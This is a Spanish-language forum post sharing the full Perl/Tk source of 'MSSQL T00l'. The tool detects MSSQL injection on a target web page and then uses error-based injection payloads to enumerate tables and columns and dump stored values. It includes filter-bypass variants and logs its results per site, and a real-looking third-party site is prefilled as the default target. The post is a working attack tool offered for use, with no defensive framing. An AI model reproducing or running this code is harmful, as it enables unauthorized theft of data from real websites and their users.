• [Perl Tk] MSSQL T00l

 #483961  por Doddy
 17 Feb 2016, 15:49
Hola , aca les dejo un programa para sacar tablas ,columnas y valores en paginas vulnerables MSSQL , todo los registros del programa se almacenan en un archivo de texto con el nombre de la web vulnerable.

Imagen :


#!usr/bin/perl
#MSSQL T00l (C) Doddy Hackman 2011

use Tk;
use LWP::UserAgent;
use URI::Split qw(uri_split);
use Win32;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

my $logo = MainWindow->new();
$logo->title("MSSQL T00l (C) Doddy Hackman 2011");
$logo->geometry("491x390+20+20");
$logo->resizable(0,0);
$logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-y=>20);
my $targetero = $logo->Entry(-width=>50,-text=>"http://www.12manage.com/profile.asp?m=drarupbarman")->place(-y=>23,-x=>90);
$logo->Button(-text=>"Test",-width=>8,-command=>\&start)->place(-y=>20,-x=>400);
$logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-y=>70);
$logo->Button(-text=>"Get Tables",-width=>13,-command=>\&getables)->place(-y=>110,-x=>57);
$logo->Button(-text=>"Get Columns",-width=>13,-command=>\&getcol)->place(-y=>110,-x=>144);
$logo->Button(-text=>"Dump values",-width=>15,-command=>\&getdata)->place(-y=>110,-x=>231);
$logo->Button(-text=>"Show Logs",-width=>15,-command=>\&otherax)->place(-y=>110,-x=>330);

$logo->Label(-text=>"Tables",-font=>"Impact1")->place(-y=>200,-x=>60);
$logo->Label(-text=>"Columns",-font=>"Impact1")->place(-y=>200,-x=>190);
$logo->Label(-text=>"Data",-font=>"Impact1")->place(-y=>200,-x=>330);

my $tablero = $logo->Listbox(-width=>20)->place(-y=>230,-x=>40);
my $columnero = $logo->Listbox(-width=>20)->place(-y=>230,-x=>180);
my $datero = $logo->Listbox(-width=>20)->place(-y=>230,-x=>320);

MainLoop;

sub start {

my $page = $targetero->get;

my $save = comer($page);

$code = toma($page."'");

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
savefile($save.".txt","\n\n[+] Page : $page\n");
Win32::MsgBox("[+] The page is vulnerable to MSSQL Injection",0,"MSSQL T00l");
} else {
Win32::MsgBox("[-] Not vulnerable",0,"MSSQL T00l");
}
}

sub getables {

$tablero->delete("0.0","end");
$columnero->delete("0.0","end");
$datero->delete("0.0","end");

my $page = $targetero->get;
my $save = comer($page);
savefile($save.".txt","\n");
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$logo->update;
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($page.$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
$logo->update;
savefile($save.".txt","[+] Table : ".$1);
$tablero->insert("end",$1);
} else {
$logo->update;
Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
last;
}
}
}


sub getcol {

$columnero->delete("0.0","end");
my $page = $targetero->get;

my $save = comer($page);
savefile($save.".txt","\n");

$d = $tablero->curselection();

for my $id (@$d) {
my $table = $tablero->get($id);

savefile($save.".txt","[+] Table extract : ".$table."\n");

($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$logo->update;
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$table."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;

$code = toma($page.$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
savefile($save.".txt","[+] Column : ".$1);
$columnero->insert("end",$table.".".$1);
} else {
$logo->update;
Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
last;
}
}
}
}

sub getdata {


$datero->delete("0.0","end");
my $page = $targetero->get;
my $save = comer($page);
savefile($save.".txt","\n");
$d = $columnero->curselection();

for my $id (@$d) {
my $tablex = $columnero->get($id);

savefile($save.".txt","[+] Dump : ".$tablex."\n");

if ($tablex=~/(.*)\.(.*)/) {
my $table = $1;
my $c = $2;
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$logo->update;
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$c.$pass1."from".$pass1.$table.$pass1."where".$pass1.$c.$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($page.$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
savefile($save.".txt","[+] $c : ".$1);
$datero->insert("end",$1);
} else {
$logo->update;
Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
last;
}
}
}
}
}

sub otherax {
my $page = $targetero->get;
my $file = comer($page);
system("start logs/webs/$file".".txt");
}


sub toma {
return $nave->get($_[0])->content;
}

sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub comer {
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
return $auth;
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

# ¿ The End ?